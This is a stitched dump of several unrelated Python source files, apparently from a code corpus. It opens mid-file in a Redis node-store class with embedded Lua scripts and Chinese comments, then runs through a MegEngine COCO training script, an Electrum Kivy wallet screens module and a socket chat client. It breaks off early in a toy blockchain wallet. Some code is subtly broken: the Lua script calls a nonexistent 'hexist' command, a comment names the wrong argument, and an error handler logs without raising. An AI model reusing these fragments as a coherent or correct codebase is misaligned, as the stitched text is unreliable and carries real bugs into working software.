"""
# 传入参数,KEYS[1]=父节点全路径,KEYS[2]=子节点名,ARGV[3]=到期时间。返回-1表示错误
refresh_node_script = """
local node_path = string.format('%s/%s', KEYS[1], KEYS[2])
if redis.call('hexist', KEYS[1], KEYS[2]) == 0 then
return -1
end
if redis.call('ttl', node_path) <0 then
return -1
end
local ret = redis.call('expireat', node_path, ARGV[1])
if ret == 1
then
redis.call('hset', KEYS[1], KEYS[2], ARGV[1])
return 1
else
return -1
end
"""
self._new_lua_sha = self._handle.script_load(new_node_script)
self._delete_lua_sha = self._handle.script_load(delete_node_script)
self._refresh_lua_sha = self._handle.script_load(refresh_node_script)
def _valid_chd(self, path, include_data=False):
"""
获取所有子节点,并校验子节点是否有效。默认不获取子节点数据
"""
def _valid():
handle = self._handle
valid_time = time.time() - self._timeout
# 考虑到性能,不做path存在性检查
chd = handle.hgetall(path)
result = {}
for k, v in chd.iteritems():
# 忽略隐藏节点
if k[0:1] == ".":
continue
chd_path = path + "/" + k
# 删除超时节点
try:
if v == "":
v = "0"
tm = float(v)
except ValueError:
continue
if v != "0" and tm < valid_time:
self.delete_node(chd_path, True)
continue
value = ""
# 获取节点的数据
if include_data:
value = self.get_data(chd_path)
result[k] = value
return result
return self._run_catch(_valid, path, True)
def _refresh(self, obpath):
"""
刷新节点属性
"""
result = {}
# 获取该路径所有状态
if self.exists(obpath):
result["exist"] = True
# 获取该路径数据
import hashlib
nodes = self._run_catch(lambda: (self._handle.hgetall(obpath)))
if ".data" in nodes:
data = nodes[".data"]
else:
data = ""
nodes[".data"] = ""
md5 = hashlib.md5()
md5.update(data)
result["md5"] = md5.hexdigest()
# 获取所有子节点,去除两个内置文件
result["children"] = set(nodes.keys())
if ".data" in result["children"]:
result["children"].remove(".data")
if ".sequence" in result["children"]:
result["children"].remove(".sequence")
else:
result["exist"] = False
result["md5"] = None
result["children"] = {}
return result
def _touch(self, tp, now):
"""
更新临时节点的时间,并清理已经过期的临时节点
"""
path, node_name = self._split_node_name(tp)
# 更新临时节点时间
try:
ret = self._handle.evalsha(self._refresh_lua_sha, 2, path, node_name, now)
if ret == -1:
self._del_record_when_delnode(tp)
except Exception as e:
self._del_record_when_delnode(tp)
@classmethod
def _run_catch(cls, func, path="", path_is_dir=False):
"""
执行func并捕获异常,将kazoo异常转换为对应的异常对象
"""
import redis
# noinspection PyBroadException
try:
return func()
except redis.exceptions.ConnectionError:
raise exception.EPConnectTimeout()
except exception.EPNoNodeError as e:
raise e
except Exception as e:
log.r(exception.EPIOError(), "Request I/O Error")
def get_data(self, path):
"""
获得指定路径path的节点数据
:param str path: 数据存储路径
:return: 节点数据
:rtype: str
:raises: exception.EPNoNodeError 节点不存在
:raises: exception.EPIOError IO异常
"""
handle = self._handle
def _readdata():
value = handle.hget(path, ".data")
if value == "" or value:
return value
else:
raise exception.EPNoNodeError
return self._run_catch(_readdata)
def save_data(self, path, data):
"""
存储数据data到特定的path路径节点
:param str path: 数据存储路径
:param str data: 待存储的数据
:return: 无返回
:rtype: None
:raises: exception.EPNoNodeError 节点不存在
:raises: exception.EPIOError IO异常
"""
handle = self._handle
def _writedata():
# 由于redis不支持事务,所以此处并不会区分节点是否存在,均直接set数据
handle.hset(path, ".data", data)
self._run_catch(_writedata)
log.d("save data success, path:{path}".format(path=path))
def _del_node(self, np, force):
"""
删除node节点即所有子节点
:param str np: 待删除节点
:return None
"""
def _deletenode(path=np):
# 由于redis不支持事务,所以此处并不会区分节点是否存在,均直接set数据
children = self.get_children(path)
for child_node in children:
_deletenode("/".join([path, child_node]))
node_path, node_name = self._split_node_name(path)
ret = self._handle.evalsha(self._delete_lua_sha, 2, node_path, node_name)
if ret == -1:
raise exception.EPNoNodeError("delete node[%s] error:%s" % (path, "Node has child"))
if force:
_deletenode()
else:
self._run_catch(_deletenode)
def create_node(self, path, value="", ephemeral=False, sequence=False, makepath=False):
"""
根据节点各属性创建节点
:param str path: 节点路径
:param str value: 待存数据
:param bool ephemeral: 是否是临时节点
:param bool sequence: 是否是顺序节点
:param bool makepath: 是否创建父节点
:return: None
:raises: exception.EPNoNodeError 节点不存在
:raises: exception.EPIOError IO异常
"""
def _createnode(np=path):
node_path, node_name = self._split_node_name(np)
errmsg = {-1: "Node has ttl or parents-node not exists",
-2: "Node exists(in parents-node record)",
-3: "Node exists"}
if not self.exists(node_path) and node_path != "/":
if makepath:
self.create_node(node_path, makepath=True)
else:
raise exception.EPNoNodeError(node_path + " not exists")
seq = 1 if sequence else 0
tm = long(time.time()) + self._timeout if ephemeral else 0
ret = self._handle.evalsha(self._new_lua_sha, 2, node_path, node_name, value, seq, tm)
if ret < 0:
raise exception.EPIOError("redis error when create[%s:%s]:%s" % (node_path, node_name, errmsg[ret]))
if ephemeral:
self._new_touch(ret)
return ret
ret = self._run_catch(_createnode)
log.d("create node success, path:{path}, value:{value}, ephemeral:"
"{ephemeral}, sequence:{sequence}, makepath:{makepath}".format(
path=ret, value=value,
ephemeral=ephemeral, sequence=sequence,
makepath=makepath))
return ret
def exists(self, path):
"""
查询制定path路径的节点是否存在
:param str path: 节点路径
:return: True或False
:rtype: bool
"""
def _existnode():
node_path, node_name = self._split_node_name(path)
ret = self._handle.hexists(node_path, node_name)
if ret != 1:
return False
ret = self._handle.exists(path)
if ret != 1:
return False
else:
return True
return self._run_catch(_existnode)
def add_listener(self, watcher):
"""
监听会话状态
:param watcher: 状态监听函数。函数形参为(state),可能的取值包括"SUSPENDED"、"CONNECTED"、"LOST"
:return: 无返回
:rtype: None
"""
log.i("nothing to do in RedisPersistence.add_listener()")
def disconnect(self):
"""
主动断开持久化请求
:return: 无返回
:rtype: None
"""
super(RedisPersistence, self).disconnect()
self._handle.close()
|
train.py | # -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import argparse
import bisect
import functools
import importlib
import multiprocessing as mp
import os
import sys
from collections import defaultdict
import megengine as mge
import numpy as np
from megengine import distributed as dist
from megengine import jit
from megengine import optimizer as optim
from megengine.data import Collator, DataLoader, Infinite, RandomSampler
from megengine.data import transform as T
from megengine.data.dataset import COCO
from tabulate import tabulate
logger = mge.get_logger(__name__)
class AverageMeter:
"""Computes and stores the average and current value"""
def __init__(self, record_len=1):
self.record_len = record_len
self.sum = [0 for i in range(self.record_len)]
self.cnt = 0
def reset(self):
self.sum = [0 for i in range(self.record_len)]
self.cnt = 0
def update(self, val):
self.sum = [s + v for s, v in zip(self.sum, val)]
self.cnt += 1
def average(self):
return [s / self.cnt for s in self.sum]
def worker(rank, world_size, args):
if world_size > 1:
dist.init_process_group(
master_ip="localhost",
master_port=23456,
world_size=world_size,
rank=rank,
dev=rank,
)
logger.info("Init process group for gpu%d done", rank)
sys.path.insert(0, os.path.dirname(args.file))
current_network = importlib.import_module(os.path.basename(args.file).split(".")[0])
model = current_network.Net(current_network.Cfg(), batch_size=args.batch_size)
params = model.parameters(requires_grad=True)
model.train()
if rank == 0:
logger.info(get_config_info(model.cfg))
opt = optim.SGD(
params,
lr=model.cfg.basic_lr * world_size * model.batch_size,
momentum=model.cfg.momentum,
weight_decay=model.cfg.weight_decay,
)
if args.weight_file is not None:
weights = mge.load(args.weight_file)
model.backbone.bottom_up.load_state_dict(weights)
logger.info("Prepare dataset")
loader = build_dataloader(model.batch_size, args.dataset_dir, model.cfg)
train_loader = iter(loader["train"])
for epoch_id in range(model.cfg.max_epoch):
for param_group in opt.param_groups:
param_group["lr"] = (
model.cfg.basic_lr
* world_size
* model.batch_size
* (
model.cfg.lr_decay_rate
** bisect.bisect_right(model.cfg.lr_decay_sates, epoch_id)
)
)
tot_steps = model.cfg.nr_images_epoch // (model.batch_size * world_size)
train_one_epoch(model, train_loader, opt, tot_steps, rank, epoch_id, world_size)
if rank == 0:
save_path = "log-of-{}/epoch_{}.pkl".format(
os.path.basename(args.file).split(".")[0], epoch_id
)
mge.save(
{"epoch": epoch_id, "state_dict": model.state_dict()}, save_path,
)
logger.info("dump weights to %s", save_path)
def adjust_learning_rate(optimizer, epoch_id, step, model, world_size):
base_lr = (
model.cfg.basic_lr
* world_size
* model.batch_size
* (
model.cfg.lr_decay_rate
** bisect.bisect_right(model.cfg.lr_decay_sates, epoch_id)
)
)
# Warm up
if epoch_id == 0 and step < model.cfg.warm_iters:
lr_factor = (step + 1.0) / model.cfg.warm_iters
for param_group in optimizer.param_groups:
param_group["lr"] = base_lr * lr_factor
def train_one_epoch(model, data_queue, opt, tot_steps, rank, epoch_id, world_size):
@jit.trace(symbolic=True, opt_level=2)
def propagate():
loss_list = model(model.inputs)
opt.backward(loss_list[0])
return loss_list
meter = AverageMeter(record_len=3)
log_interval = model.cfg.log_interval
for step in range(tot_steps):
adjust_learning_rate(opt, epoch_id, step, model, world_size)
mini_batch = next(data_queue)
model.inputs["image"].set_value(mini_batch["data"])
model.inputs["gt_boxes"].set_value(mini_batch["gt_boxes"])
model.inputs["im_info"].set_value(mini_batch["im_info"])
opt.zero_grad()
loss_list = propagate()
opt.step()
if rank == 0:
meter.update([loss.numpy() for loss in loss_list])
if step % log_interval == 0:
average_loss = meter.average()
logger.info(
"e%d, %d/%d, lr:%f, cls:%f, loc:%f",
epoch_id,
step,
tot_steps,
opt.param_groups[0]["lr"],
average_loss[1],
average_loss[2],
)
meter.reset()
def make_parser():
parser = argparse.ArgumentParser()
parser.add_argument(
"-f", "--file", default="net.py", type=str, help="net description file"
)
parser.add_argument(
"-w", "--weight_file", default=None, type=str, help="pre-train weights file",
)
parser.add_argument(
"-n", "--ngpus", default=-1, type=int, help="total number of gpus for training",
)
parser.add_argument(
"-b", "--batch_size", default=2, type=int, help="batchsize for training",
)
parser.add_argument(
"-d", "--dataset_dir", default="/data/datasets/coco", type=str,
)
return parser
def get_config_info(config):
config_table = []
for c, v in config.__dict__.items():
if not isinstance(v, (int, float, str, list, tuple, dict, np.ndarray)):
if hasattr(v, "__name__"):
v = v.__name__
elif hasattr(v, "__class__"):
v = v.__class__
elif isinstance(v, functools.partial):
v = v.func.__name__
config_table.append((str(c), str(v)))
config_table = tabulate(config_table)
return config_table
def main():
parser = make_parser()
args = parser.parse_args()
# ------------------------ begin training -------------------------- #
valid_nr_dev = mge.get_device_count("gpu")
if args.ngpus == -1:
world_size = valid_nr_dev
else:
if args.ngpus > valid_nr_dev:
logger.error("do not have enough gpus for training")
sys.exit(1)
else:
world_size = args.ngpus
logger.info("Device Count = %d", world_size)
log_dir = "log-of-{}".format(os.path.basename(args.file).split(".")[0])
if not os.path.isdir(log_dir):
os.makedirs(log_dir)
if world_size > 1:
mp.set_start_method("spawn")
processes = list()
for i in range(world_size):
process = mp.Process(target=worker, args=(i, world_size, args))
process.start()
processes.append(process)
for p in processes:
p.join()
else:
worker(0, 1, args)
def build_dataloader(batch_size, data_dir, cfg):
train_dataset = COCO(
os.path.join(data_dir, "train2017"),
os.path.join(data_dir, "annotations/instances_train2017.json"),
remove_images_without_annotations=True,
order=["image", "boxes", "boxes_category", "info"],
)
train_sampler = Infinite(RandomSampler(train_dataset, batch_size, drop_last=True))
train_dataloader = DataLoader(
train_dataset,
sampler=train_sampler,
transform=T.Compose(
transforms=[
T.ShortestEdgeResize(
cfg.train_image_short_size, cfg.train_image_max_size
),
T.RandomHorizontalFlip(),
T.ToMode(),
],
order=["image", "boxes", "boxes_category"],
),
collator=DetectionPadCollator(),
num_workers=2,
)
return {"train": train_dataloader}
class DetectionPadCollator(Collator):
def __init__(self, pad_value: float = 0.0):
super().__init__()
self.pad_value = pad_value
def apply(self, inputs):
"""
assume order = ["image", "boxes", "boxes_category", "info"]
"""
batch_data = defaultdict(list)
for image, boxes, boxes_category, info in inputs:
batch_data["data"].append(image)
batch_data["gt_boxes"].append(
np.concatenate([boxes, boxes_category[:, np.newaxis]], axis=1).astype(
np.float32
)
)
_, current_height, current_width = image.shape
assert len(boxes) == len(boxes_category)
num_instances = len(boxes)
info = [
current_height,
current_width,
info[0],
info[1],
num_instances,
]
batch_data["im_info"].append(np.array(info, dtype=np.float32))
for key, value in batch_data.items():
pad_shape = list(max(s) for s in zip(*[x.shape for x in value]))
pad_value = [
np.pad(
v,
self._get_padding(v.shape, pad_shape),
constant_values=self.pad_value,
)
for v in value
]
batch_data[key] = np.ascontiguousarray(pad_value)
return batch_data
def _get_padding(self, original_shape, target_shape):
assert len(original_shape) == len(target_shape)
shape = []
for o, t in zip(original_shape, target_shape):
shape.append((0, t - o))
return tuple(shape)
if __name__ == "__main__":
main()
|
screens.py | import asyncio
from weakref import ref
from decimal import Decimal
import re
import threading
import traceback, sys
from typing import TYPE_CHECKING, List, Optional
from kivy.app import App
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.compat import string_types
from kivy.properties import (ObjectProperty, DictProperty, NumericProperty,
ListProperty, StringProperty)
from kivy.uix.recycleview import RecycleView
from kivy.uix.label import Label
from kivy.uix.behaviors import ToggleButtonBehavior
from kivy.uix.image import Image
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.utils import platform
from kivy.logger import Logger
from electrum.util import profiler, parse_URI, format_time, InvalidPassword, NotEnoughFunds, Fiat
from electrum.util import PR_TYPE_ONCHAIN, PR_TYPE_LN
from electrum import bitcoin, constants
from electrum.transaction import Transaction, tx_from_any, PartialTransaction, PartialTxOutput
from electrum.util import (parse_URI, InvalidBitcoinURI, PR_PAID, PR_UNKNOWN, PR_EXPIRED,
PR_INFLIGHT, TxMinedInfo, get_request_status, pr_expiration_values,
maybe_extract_bolt11_invoice)
from electrum.plugin import run_hook
from electrum.wallet import InternalAddressCorruption
from electrum import simple_config
from electrum.lnaddr import lndecode
from electrum.lnutil import RECEIVED, SENT, PaymentFailure
from .dialogs.question import Question
from .dialogs.lightning_open_channel import LightningOpenChannelDialog
from electrum.gui.kivy.i18n import _
if TYPE_CHECKING:
from electrum.gui.kivy.main_window import ElectrumWindow
from electrum.paymentrequest import PaymentRequest
class HistoryRecycleView(RecycleView):
pass
class RequestRecycleView(RecycleView):
pass
class PaymentRecycleView(RecycleView):
pass
class CScreen(Factory.Screen):
__events__ = ('on_activate', 'on_deactivate', 'on_enter', 'on_leave')
action_view = ObjectProperty(None)
loaded = False
kvname = None
app = App.get_running_app() # type: ElectrumWindow
def _change_action_view(self):
app = App.get_running_app()
action_bar = app.root.manager.current_screen.ids.action_bar
_action_view = self.action_view
if (not _action_view) or _action_view.parent:
return
action_bar.clear_widgets()
action_bar.add_widget(_action_view)
def on_enter(self):
# FIXME: use a proper event don't use animation time of screen
Clock.schedule_once(lambda dt: self.dispatch('on_activate'), .25)
pass
def update(self):
pass
@profiler
def load_screen(self):
self.screen = Builder.load_file('electrum/gui/kivy/uix/ui_screens/' + self.kvname + '.kv')
self.add_widget(self.screen)
self.loaded = True
self.update()
setattr(self.app, self.kvname + '_screen', self)
def on_activate(self):
if self.kvname and not self.loaded:
self.load_screen()
#Clock.schedule_once(lambda dt: self._change_action_view())
def on_leave(self):
self.dispatch('on_deactivate')
def on_deactivate(self):
pass
# note: this list needs to be kept in sync with another in qt
TX_ICONS = [
"unconfirmed",
"close",
"unconfirmed",
"close",
"clock1",
"clock2",
"clock3",
"clock4",
"clock5",
"confirmed",
]
class HistoryScreen(CScreen):
tab = ObjectProperty(None)
kvname = 'history'
cards = {}
def __init__(self, **kwargs):
self.ra_dialog = None
super(HistoryScreen, self).__init__(**kwargs)
def show_item(self, obj):
key = obj.key
tx_item = self.history.get(key)
if tx_item.get('lightning') and tx_item['type'] == 'payment':
self.app.lightning_tx_dialog(tx_item)
return
if tx_item.get('lightning'):
tx = self.app.wallet.lnworker.lnwatcher.db.get_transaction(key)
else:
tx = self.app.wallet.db.get_transaction(key)
if not tx:
return
self.app.tx_dialog(tx)
def get_card(self, tx_item): #tx_hash, tx_mined_status, value, balance):
is_lightning = tx_item.get('lightning', False)
timestamp = tx_item['timestamp']
key = tx_item.get('txid') or tx_item['payment_hash']
if is_lightning:
status = 0
status_str = 'unconfirmed' if timestamp is None else format_time(int(timestamp))
icon = "atlas://electrum/gui/kivy/theming/light/lightning"
message = tx_item['label']
fee_msat = tx_item['fee_msat']
fee = int(fee_msat/1000) if fee_msat else None
fee_text = '' if fee is None else 'fee: %d sat'%fee
else:
tx_hash = tx_item['txid']
conf = tx_item['confirmations']
tx_mined_info = TxMinedInfo(height=tx_item['height'],
conf=tx_item['confirmations'],
timestamp=tx_item['timestamp'])
status, status_str = self.app.wallet.get_tx_status(tx_hash, tx_mined_info)
icon = "atlas://electrum/gui/kivy/theming/light/" + TX_ICONS[status]
message = tx_item['label'] or tx_hash
fee = tx_item['fee_sat']
fee_text = '' if fee is None else 'fee: %d sat'%fee
ri = {}
ri['screen'] = self
ri['key'] = key
ri['icon'] = icon
ri['date'] = status_str
ri['message'] = message
ri['fee_text'] = fee_text
value = tx_item['value'].value
if value is not None:
ri['is_mine'] = value <= 0
ri['amount'] = self.app.format_amount(value, is_diff = True)
if 'fiat_value' in tx_item:
ri['quote_text'] = str(tx_item['fiat_value'])
return ri
def update(self, see_all=False):
wallet = self.app.wallet
if wallet is None:
return
self.history = wallet.get_full_history(self.app.fx)
history = reversed(self.history.values())
history_card = self.screen.ids.history_container
history_card.data = [self.get_card(item) for item in history]
class SendScreen(CScreen):
kvname = 'send'
payment_request = None # type: Optional[PaymentRequest]
payment_request_queued = None # type: Optional[str]
parsed_URI = None
def set_URI(self, text: str):
if not self.app.wallet:
self.payment_request_queued = text
return
try:
uri = parse_URI(text, self.app.on_pr, loop=self.app.asyncio_loop)
except InvalidBitcoinURI as e:
self.app.show_info(_("Error parsing URI") + f":\n{e}")
return
self.parsed_URI = uri
amount = uri.get('amount')
self.screen.address = uri.get('address', '')
self.screen.message = uri.get('message', '')
self.screen.amount = self.app.format_amount_and_units(amount) if amount else ''
self.payment_request = None
self.screen.is_lightning = False
def set_ln_invoice(self, invoice):
try:
invoice = str(invoice).lower()
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
self.app.show_info(invoice + _(" is not a valid Lightning invoice: ") + repr(e)) # repr because str(Exception()) == ''
return
self.screen.address = invoice
self.screen.message = dict(lnaddr.tags).get('d', None)
self.screen.amount = self.app.format_amount_and_units(lnaddr.amount * bitcoin.COIN) if lnaddr.amount else ''
self.payment_request = None
self.screen.is_lightning = True
def update(self):
if not self.loaded:
return
if self.app.wallet and self.payment_request_queued:
self.set_URI(self.payment_request_queued)
self.payment_request_queued = None
_list = self.app.wallet.get_invoices()
lnworker_logs = self.app.wallet.lnworker.logs if self.app.wallet.lnworker else {}
_list = [x for x in _list if x and x.get('status') != PR_PAID or x.get('rhash') in lnworker_logs]
payments_container = self.screen.ids.payments_container
payments_container.data = [self.get_card(item) for item in _list]
def show_item(self, obj):
self.app.show_invoice(obj.is_lightning, obj.key)
def get_card(self, item):
invoice_type = item['type']
status, status_str = get_request_status(item) # convert to str
if invoice_type == PR_TYPE_LN:
key = item['rhash']
log = self.app.wallet.lnworker.logs.get(key)
if item['status'] == PR_INFLIGHT and log:
status_str += '... (%d)'%len(log)
elif invoice_type == PR_TYPE_ONCHAIN:
key = item['id']
else:
raise Exception('unknown invoice type')
return {
'is_lightning': invoice_type == PR_TYPE_LN,
'is_bip70': 'bip70' in item,
'screen': self,
'status': status,
'status_str': status_str,
'key': key,
'memo': item['message'],
'amount': self.app.format_amount_and_units(item['amount'] or 0),
}
def do_clear(self):
self.screen.amount = ''
self.screen.message = ''
self.screen.address = ''
self.payment_request = None
self.screen.is_lightning = False
self.screen.is_bip70 = False
self.parsed_URI = None
def set_request(self, pr: 'PaymentRequest'):
self.screen.address = pr.get_requestor()
amount = pr.get_amount()
self.screen.amount = self.app.format_amount_and_units(amount) if amount else ''
self.screen.message = pr.get_memo()
self.screen.locked = True
self.payment_request = pr
def do_paste(self):
data = self.app._clipboard.paste().strip()
if not data:
self.app.show_info(_("Clipboard is empty"))
return
# try to decode as transaction
try:
tx = tx_from_any(data)
tx.deserialize()
except:
tx = None
if tx:
self.app.tx_dialog(tx)
return
# try to decode as URI/address
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
else:
self.set_URI(data)
def read_invoice(self):
address = str(self.screen.address)
if not address:
self.app.show_error(_('Recipient not specified.') + ' ' + _('Please scan a Bitcoin address or a payment request'))
return
if not self.screen.amount:
self.app.show_error(_('Please enter an amount'))
return
try:
amount = self.app.get_amount(self.screen.amount)
except:
self.app.show_error(_('Invalid amount') + ':\n' + self.screen.amount)
return
message = self.screen.message
if self.screen.is_lightning:
return self.app.wallet.lnworker.parse_bech32_invoice(address)
else: # on-chain
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
if not bitcoin.is_address(address):
self.app.show_error(_('Invalid Bitcoin Address') + ':\n' + address)
return
outputs = [PartialTxOutput.from_address_and_value(address, amount)]
return self.app.wallet.create_invoice(outputs, message, self.payment_request, self.parsed_URI)
def do_save(self):
invoice = self.read_invoice()
if not invoice:
return
self.app.wallet.save_invoice(invoice)
self.do_clear()
self.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.app.wallet.save_invoice(invoice)
self.do_clear()
self.update()
self.do_pay_invoice(invoice)
def do_pay_invoice(self, invoice):
if invoice['type'] == PR_TYPE_LN:
self._do_pay_lightning(invoice)
return
elif invoice['type'] == PR_TYPE_ONCHAIN:
do_pay = lambda rbf: self._do_pay_onchain(invoice, rbf)
if self.app.electrum_config.get('use_rbf'):
d = Question(_('Should this transaction be replaceable?'), do_pay)
d.open()
else:
do_pay(False)
else:
raise Exception('unknown invoice type')
def _do_pay_lightning(self, invoice):
attempts = 10
threading.Thread(target=self.app.wallet.lnworker.pay, args=(invoice['invoice'], invoice['amount'], attempts)).start()
def _do_pay_onchain(self, invoice, rbf):
# make unsigned transaction
outputs = invoice['outputs'] # type: List[PartialTxOutput]
amount = sum(map(lambda x: x.value, outputs))
coins = self.app.wallet.get_spendable_coins(None)
try:
tx = self.app.wallet.make_unsigned_transaction(coins=coins, outputs=outputs)
except NotEnoughFunds:
self.app.show_error(_("Not enough funds"))
return
except Exception as e:
Logger.exception('')
self.app.show_error(repr(e))
return
if rbf:
tx.set_rbf(True)
fee = tx.get_fee()
msg = [
_("Amount to be sent") + ": " + self.app.format_amount_and_units(amount),
_("Mining fee") + ": " + self.app.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.app.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append(_("Additional fees") + ": " + self.app.format_amount_and_units(x_fee_amount))
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
msg.append(_("Enter your PIN code to proceed"))
self.app.protected('\n'.join(msg), self.send_tx, (tx,))
def send_tx(self, tx, password):
if self.app.wallet.has_password() and password is None:
return
def on_success(tx):
if tx.is_complete():
self.app.broadcast(tx)
else:
self.app.tx_dialog(tx)
def on_failure(error):
self.app.show_error(error)
if self.app.wallet.can_sign(tx):
self.app.show_info("Signing...")
self.app.sign_tx(tx, password, on_success, on_failure)
else:
self.app.tx_dialog(tx)
class ReceiveScreen(CScreen):
kvname = 'receive'
def __init__(self, **kwargs):
super(ReceiveScreen, self).__init__(**kwargs)
Clock.schedule_interval(lambda dt: self.update(), 5)
def expiry(self):
return self.app.electrum_config.get('request_expiry', 3600) # 1 hour
def clear(self):
self.screen.address = ''
self.screen.amount = ''
self.screen.message = ''
self.screen.lnaddr = ''
def set_address(self, addr):
self.screen.address = addr
def on_address(self, addr):
req = self.app.wallet.get_request(addr)
self.screen.status = ''
if req:
self.screen.message = req.get('memo', '')
amount = req.get('amount')
self.screen.amount = self.app.format_amount_and_units(amount) if amount else ''
status = req.get('status', PR_UNKNOWN)
self.screen.status = _('Payment received') if status == PR_PAID else ''
def get_URI(self):
from electrum.util import create_bip21_uri
amount = self.screen.amount
if amount:
a, u = self.screen.amount.split()
assert u == self.app.base_unit
amount = Decimal(a) * pow(10, self.app.decimal_point())
return create_bip21_uri(self.screen.address, amount, self.screen.message)
def do_copy(self):
uri = self.get_URI()
self.app._clipboard.copy(uri)
self.app.show_info(_('Request copied to clipboard'))
def new_request(self, lightning):
amount = self.screen.amount
amount = self.app.get_amount(amount) if amount else 0
message = self.screen.message
if lightning:
key = self.app.wallet.lnworker.add_request(amount, message, self.expiry())
else:
addr = self.screen.address or self.app.wallet.get_unused_address()
if not addr:
self.app.show_info(_('No address available. Please remove some of your pending requests.'))
return
self.screen.address = addr
req = self.app.wallet.make_payment_request(addr, amount, message, self.expiry())
self.app.wallet.add_payment_request(req)
key = addr
self.clear()
self.update()
self.app.show_request(lightning, key)
def get_card(self, req):
is_lightning = req.get('type') == PR_TYPE_LN
if not is_lightning:
address = req['address']
key = address
else:
key = req['rhash']
address = req['invoice']
amount = req.get('amount')
description = req.get('memo', '')
status, status_str = get_request_status(req)
ci = {}
ci['screen'] = self
ci['address'] = address
ci['is_lightning'] = is_lightning
ci['key'] = key
ci['amount'] = self.app.format_amount_and_units(amount) if amount else ''
ci['memo'] = description
ci['status'] = status_str
ci['is_expired'] = status == PR_EXPIRED
return ci
def update(self):
if not self.loaded:
return
_list = self.app.wallet.get_sorted_requests()
requests_container = self.screen.ids.requests_container
requests_container.data = [self.get_card(item) for item in _list if item.get('status') != PR_PAID]
def show_item(self, obj):
self.app.show_request(obj.is_lightning, obj.key)
def expiration_dialog(self, obj):
from .dialogs.choice_dialog import ChoiceDialog
def callback(c):
self.app.electrum_config.set_key('request_expiry', c)
d = ChoiceDialog(_('Expiration date'), pr_expiration_values, self.expiry(), callback)
d.open()
def clear_requests_dialog(self):
requests = self.app.wallet.get_sorted_requests()
expired = [req for req in requests if get_request_status(req)[0] == PR_EXPIRED]
if len(expired) == 0:
return
def callback(c):
if c:
for req in expired:
key = req.get('rhash') or req['address']
self.app.wallet.delete_request(key)
self.update()
d = Question(_('Delete expired requests?'), callback)
d.open()
class TabbedCarousel(Factory.TabbedPanel):
'''Custom TabbedPanel using a carousel used in the Main Screen
'''
carousel = ObjectProperty(None)
def animate_tab_to_center(self, value):
scrlv = self._tab_strip.parent
if not scrlv:
return
idx = self.tab_list.index(value)
n = len(self.tab_list)
if idx in [0, 1]:
scroll_x = 1
elif idx in [n-1, n-2]:
scroll_x = 0
else:
scroll_x = 1. * (n - idx - 1) / (n - 1)
mation = Factory.Animation(scroll_x=scroll_x, d=.25)
mation.cancel_all(scrlv)
mation.start(scrlv)
def on_current_tab(self, instance, value):
self.animate_tab_to_center(value)
def on_index(self, instance, value):
current_slide = instance.current_slide
if not hasattr(current_slide, 'tab'):
return
tab = current_slide.tab
ct = self.current_tab
try:
if ct.text != tab.text:
carousel = self.carousel
carousel.slides[ct.slide].dispatch('on_leave')
self.switch_to(tab)
carousel.slides[tab.slide].dispatch('on_enter')
except AttributeError:
current_slide.dispatch('on_enter')
def switch_to(self, header):
# we have to replace the functionality of the original switch_to
if not header:
return
if not hasattr(header, 'slide'):
header.content = self.carousel
super(TabbedCarousel, self).switch_to(header)
try:
tab = self.tab_list[-1]
except IndexError:
return
self._current_tab = tab
tab.state = 'down'
return
carousel = self.carousel
self.current_tab.state = "normal"
header.state = 'down'
self._current_tab = header
# set the carousel to load the appropriate slide
# saved in the screen attribute of the tab head
slide = carousel.slides[header.slide]
if carousel.current_slide != slide:
carousel.current_slide.dispatch('on_leave')
carousel.load_slide(slide)
slide.dispatch('on_enter')
def add_widget(self, widget, index=0):
if isinstance(widget, Factory.CScreen):
self.carousel.add_widget(widget)
return
super(TabbedCarousel, self).add_widget(widget, index=index)
|
client.py | import socket
import threading
import time
# Create constants
HEADER = 64
PORT = 5050
FORMAT = 'utf-8'
DC_MSG = "!DISCONNECT"
SERVER = "localhost"
ADDR = (SERVER, PORT)
# Set up client var and connect to the server
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(ADDR)
erase = '\x1b[1A\x1b[K'
# Handles sending a message to the server
def send(sendMsg):
# Encode and create header
message = sendMsg.encode(FORMAT)
msg_len = len(message)
send_len = str(msg_len).encode(FORMAT)
send_len += b' ' * (HEADER - len(send_len))
client.send(send_len)
# Send the actual text
client.send(message)
# A thread to handle receiving messages broadcast from the server
def recvThread():
try:
# Wait for a message from the server and then decode and print it, while keeping the prompt on the same line
while True:
msg_len = client.recv(HEADER).decode(FORMAT)
if msg_len:
msg_len = int(msg_len)
recvMsg = client.recv(msg_len).decode(FORMAT)
print(f"\n{erase}{recvMsg}\n[{uname}]: ", end="")
except Exception as e:
return e
# Main thread
try:
# Send initial message to set up username
uname = input("Enter a username: ")
send(uname)
# Start handling received messages
RECVTHREAD = threading.Thread(target=recvThread)
RECVTHREAD.start()
# Handle the prompt and sending messages
while True:
msg = input(f"[{uname}]: ")
send(msg)
print("\x1b[A\x1b[K", end="")
if msg == DC_MSG:
break
# Close everything if ctrl+c is pressed
finally:
send(DC_MSG)
time.sleep(0.5)
client.close()
print("\ngoodbye")
exit()
|
Wallet.py | #Wallet
import SocketUtils
import Transactions
import TxBlock
import pickle
import Signatures
head_blocks = [None]
wallets = [('localhost',5006)]
miners = [('localhost',5005),('localhost',5007)]
break_now = False
verbose = True
my_private,my_public = Signatures.generate_keys()
tx_index = {}
def StopAll():
global break_now
break_now = True
def walletServer(my_addr):
global head_blocks
global tx_index
try:
head_blocks = TxBlock.loadBlocks("AllBlocks.dat")
